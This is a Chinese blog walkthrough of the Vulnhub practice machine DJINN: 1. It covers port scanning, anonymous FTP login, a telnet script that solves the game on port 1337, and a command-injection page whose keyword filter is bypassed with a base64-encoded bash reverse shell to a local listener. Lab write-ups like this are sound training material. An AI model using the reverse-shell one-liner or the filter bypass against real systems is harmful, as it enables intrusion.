Vulnhub靶机:DJINN_ 1

最新推荐文章于 2024-03-22 11:53:41 发布
最新推荐文章于 2024-03-22 11:53:41 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 靶机 文章标签: Vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/122775986
版权

目录

介绍

系列:djinn(此系列共3台)
发布日期:2019 年 11 月 18 日
难度:初级-中级
Flag : 2个,普通用户的user.txt和root用户的root.txt
学习:

  • gobuster 目录扫描
  • ftp 匿名登录
  • bypass 命令执行漏洞
  • 反弹 shell 的使用

靶机地址:https://www.vulnhub.com/entry/djinn-1,397/

信息收集

主机发现

nmap -sn 192.168.40.0/24

在这里插入图片描述

主机信息探测

信息探测:nmap -A -p- 192.168.40.151,开放了21、22、7331(http)等端口

  • ftp允许匿名登录
  • 扫描ssh时被过滤了
  • 1337不知道是个什么端口
  • 7331端口是个 python环境的 web服务

在这里插入图片描述

在这里插入图片描述

测试1337端口

用nc连接了一下,得到提示,连续正确回答问题1000次,会得到一个礼物。不知道这个端口到底运行的是什么服务类型,因此不好使用python导入相关的库文件,暂时放下这个端口,先看看别的服务。
在这里插入图片描述

补充:后续在网上找到相关资料,此端口运行的是telnet服务,有如下脚本:

# coding:utf-8
import logging
import telnetlib
import time
import re


def main():
    try:
        tn = telnetlib.Telnet('192.168.40.151', port=1337)
    except:
        logging.warning("errr")
    time.sleep(0.5)
    loop = 1
    while loop < 1002:
        data = tn.read_very_eager().decode('ascii')
        print(data)
        res = re.search('(.*?)\s>', data).group(1)
        datas = str(calc(res)).strip()
        print(str(loop) + ":" + datas)
        loop = loop + 1
        tn.write(datas.encode('ascii') + b"\n")
        time.sleep(0.1)
    data = tn.read_very_eager().decode('ascii')
    return data


def calc(res):
    res_str = res.strip('(').strip(")").replace("'", "")
    muns = res_str.split(',')
    munber1 = muns[0].strip()
    orperator = muns[1].strip()
    munber2 = muns[2].strip()
    res = eval(munber1 + orperator + munber2)
    return res


print(main())

计算了1000次之后,得到了一些数字:1356, 6784, 3409。这些数字可以用来开启SSH服务。
在这里插入图片描述

安装Knockd,打开SSH:apt install knockd
参见:通过Knockd隐藏SSH,让黑客看不见你的服务器
在这里插入图片描述

测试21端口(ftp)

直接尝试空用户名和密码登录失败了,额,,,,,实际上好久没接触过ftp了,都不知道怎么匿名登录了。那就抓个包看看nmap是怎么匿名登录的吧
在这里插入图片描述

直接搜索success关键字
在这里插入图片描述

在这里插入图片描述

得到用户名:anonymous,密码:IEUser@,开始登录,并下载文件
在这里插入图片描述

通过ftp服务,得到了以下信息。

  • nitu:81299,不确定是什么意思
  • 1337端口上有一个小游戏,我们如果能胜利的话会得到一个奖励
  • @nitish81299,看起来像是一个密码

在这里插入图片描述

测试7331端口(web)

打开网站,没什么有用的信息
在这里插入图片描述

尝试目录扫描

gobuster dir -u http://192.168.40.151:7331/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 100

在这里插入图片描述

访问/genie目录,页面403,屏幕上方有一段内容看不清晰,通过审查元素看到写的是:It’s not that hard
在这里插入图片描述

访问/wish目录,看起来像是命令执行,测试一下,一旦执行下面的命令,页面会跳转,并通过审查元素可以定位出命令执行结果
在这里插入图片描述

在这里插入图片描述

命令执行-反弹shell

既然都可以命令执行了,那就反弹shell吧。
kali监听:nc -nvlp 4444
命令执行:bash -i >& /dev/tcp/192.168.40.129/4444 0>&1
但是失败了,页面显示: Wrong choice of words。猜测可能是内容被过滤了。
在这里插入图片描述

尝试base64编码绕过,顺带着启动bp,方便调试。

  1. 得到base64编码的命令:
┌──(root💀kali)-[~]
└─# echo "bash -i >& /dev/tcp/192.168.40.129/4444 0>&1" | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOS80NDQ0IDA+JjEK
  1. 解码base64
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOS80NDQ0IDA+JjEK" | base -d | bash

按Ctrl+U,编码快捷键
在这里插入图片描述

获取第一个Flag

发现有两个用户sam和nitish,直接查看文件,权限不允许
在这里插入图片描述

一番搜寻之后,在 nitish 的家目录下发现了 nitish 的密码,拿到第一个Flag
在这里插入图片描述

提权

尝试使用sudo提权,发现了genie,暂时不知道咋用的,看一下使用说明。
在这里插入图片描述

看不大懂,直接百度一下得到提权的用法。
切换到 sam 用户,再次尝试sudo提权,发现了/root/lago
在这里插入图片描述

看不大懂,直接百度一下得到提权的用法。
在这里插入图片描述

获取第二个Flag

之前没能看到的user.txt
在这里插入图片描述

最后一个Flag
在这里插入图片描述

总结

  1. nmap端口扫描,发现21ftp、22ssh、1337服务未知、7331web
  2. 21端口通过抓包得到匿名登陆的账密,得到一些信息,但一直没有用到。
  3. 22端口被过滤了,后来通过完成游戏,使用Knockd开启了此端口,但后续一直没有用到。
  4. 1337端口是个小游戏,胜利之后会得到一串数字,可以用来打开ssh服务,但后续一直没有用到。
  5. 7331端口是web服务,使用gobuster进行目录扫描发现子目录,测试出命令执行漏洞,获取反弹shell
    a. 通过搜寻文件获取普通用户的账密,并切换身份。
    b. 两次通过sudo提权

参考

通过Knockd隐藏SSH,让黑客看不见你的服务器
djinn: 1 vulnhub Walkthrough

lainwith
关注
专栏目录
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4241
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
Vulnhub靶机:BOREDHACKERBLOG: SOCIAL NETWORK
tang502的博客
09-24 1208
如果/proc/1/cgroup文件里面可以看到docker,以及docker的hash值。从页面exec()调用命令看出他是python,所以只要建立监听,用python反弹shell。反弹shell工具:https://forum.ywhack.com/shell.php。如果根目录下存在dockerenv,那么有极大的概率,我们是在docker环境中。查看ip,如果ip与网站ip不同,那么有极大的概率,我们是在docker环境中。发现为64的系统,可连接工具Venom,进行docks配置。
vulnhub靶机djinn:1渗透笔记
weixin_52268949的博客
02-16 2054
djinn:1渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/djinn-1,397/ 信息收集 首先我们嘚确保一点,kali机和靶机处于同一网段,查看kali ip地址 当打开这台靶机的时候我们就知道ip地址 由于我们已经确定了靶机的ip所以我们直接扫描开放端口 nmap -A -p- 192.168.20.145 首先我们去访问一下21端口的ftp服务,发现可以匿名登录。根目录有三个txt文本文件我们依次打开查看 creds.txt nitu:81299
vulnhub djinn: 1
箭雨镜屋
05-26 610
渗透思路:nmap扫描----匿名登录ftp----gobuster扫描网站目录----利用RCE getshell(payload需要base64编码)----寻找敏感信息切换到用户nitish----sudo切换到sam(善用man命令)----sudo提权到root(使用uncompyle6反编译.pyc)
VulnHub系列』djinn: 1-Walkthrough
ins1ght的博客
12-02 1134
靶机发布日期:2019年11月18日,难度:中等。摘要啥的不重要~
vulnhub-djinn1
KAKA的博客
07-14 447
获取 IP 地址,目标机器已显示: 获取信息:nmap -A -p- 192.168.67.108 得到 4 个端口: 21 --> FTP --> open --> 猜测有文件可获取 22 --> SSH --> filtered --> 猜测为敲门服务[DC 有练过] 1337 --> SOME --> open --> 使用 nc 连接 7331 --> HTTP --> open --> 网页 21 --> FTP
Vulnhub-靶机-Djinn 1
qq_43264813的博客
01-28 478
Vulnhub靶机Djinn 1 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/djinn-1,397/ 文章目录Vulnhub靶机Djinn 1一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址并进行全端口扫描: 【命令】nmap -n -sC -sV -p- 192.168.110.132 【步骤二】发现开放了21端
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2504
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1913
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
Vulnhub靶机渗透 -- DJINN: 1
miko's blog
11-03 303
Vulnhub靶机渗透 — DJINN: 1 0x00 前言: 介系一个及其简单的靶机 非常适合新玩家对她进行渗透 (可以从这里下哦) 啊是的没了,就这些 0x01 信息收集: 进行常规的靶机安装操作后(还是用的VirtualBox),可以发现这台靶机是非常贴心的,已经告诉我们ip了,就不需要我们直接再去扫网段了 简单地用nmap扫描一下能够获得大部分内容 可以发现ssh是被过滤的,我的脑袋瓜啊一下子就想到了knockd,但是重新用sV扫全端口还是不对,要么就是没有这个漏洞,要么就是端口顺序不对 由于
Vulnhub-Djinn靶机-Writeup
Vicl1fe的博客
12-03 1251
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/djinn-1,397/ 靶机知识点: arp-scan nmap ftp nc dirsearch 命令执行 python2 input漏洞 主机发现 靶机是ova格式的,可以用Vmware导入,也可以用virtualbox打开。 使用...
渗透测试靶场练习——Djinn
Aibne_的博客
06-13 817
渗透测试靶场练习——Djinn
靶机测试djinn笔记
qq_56426046的博客
01-13 442
函数将传入来的字符串进行条件判断,如果满足以下条件等于 true 返回并且不会这些下面语句。翻译 哦,我忘了告诉你我在 1337 号港口为你准备了一个游戏。发现可以不需要密码执行 root 用户下的/root/lago 文件。这是 python flask 框架的 app.py 文件。帮助文档告诉我们可以执行 shell 经过测试均不能执行。通过这份源码 可以判断与 root/lago 文件一样。当 s 等于 num 会这些执行/bin/sh。
vulnhub靶机-djinn
臭nana的博客
06-27 965
1、找到靶机ip:192.168.0.108
Hack djinn:1 : walkthrough【VulnHub靶场】渗透测试实战系列7
重新启程
12-14 913
靶场地址:djinn: 1 靶场介绍: Level: Beginner-Intermediate flags: user.txt and root.txt Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You'll...
djinn vulnhub 靶机渗透过程
mrwangtw的博客
01-19 1952
靶机下载地址:vulnhub官网 下载下来之后,我这边用的是virtualbox,kali攻击机与靶机都设置为net网络。 第一步,靶机扫描,这里打开靶机就能看到 ,靶机地址为10.0.2.43,这一步探测靶机地址可以不做,这里我的kali地址为10.0.2.4 第二步,靶机端口扫描 直接nmap扫描,具体命令就是nmap -sS -p 1-65535 10.0.2.43 第三步,信息的搜集。先进入ftp查看有什么文件线索,这里用anonymous(匿名)方式登录,可以看到三个文件
djinn2 vulnhub 渗透靶机过程
mrwangtw的博客
01-20 2779
这次的靶机感觉挺难的,过程中看了大佬的博客,跟着做了很多次,才完成了提权到root。 靶机扫描 这次的djinn2和djinn1是一样的,打开就可以看到IP地址,我的靶机地址为10.0.2.44,攻击机10.0.2.4. 端口扫描 跟djinn1一样用匿名的方式登录ftp 把三个文件下载下来查看 有用的信息也就第一个,另外的文件没什么可用的信息。 从上面的端口扫描结果发现,开放了ssh,尝试用第一个文件登录发现不可行。 进入 1337端口,结果同djinn1一样,不能用浏览器打开
vulnhub靶机djinn1
最新发布
waitagirl的博客
03-22 734
vulnhub靶机djinn1
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值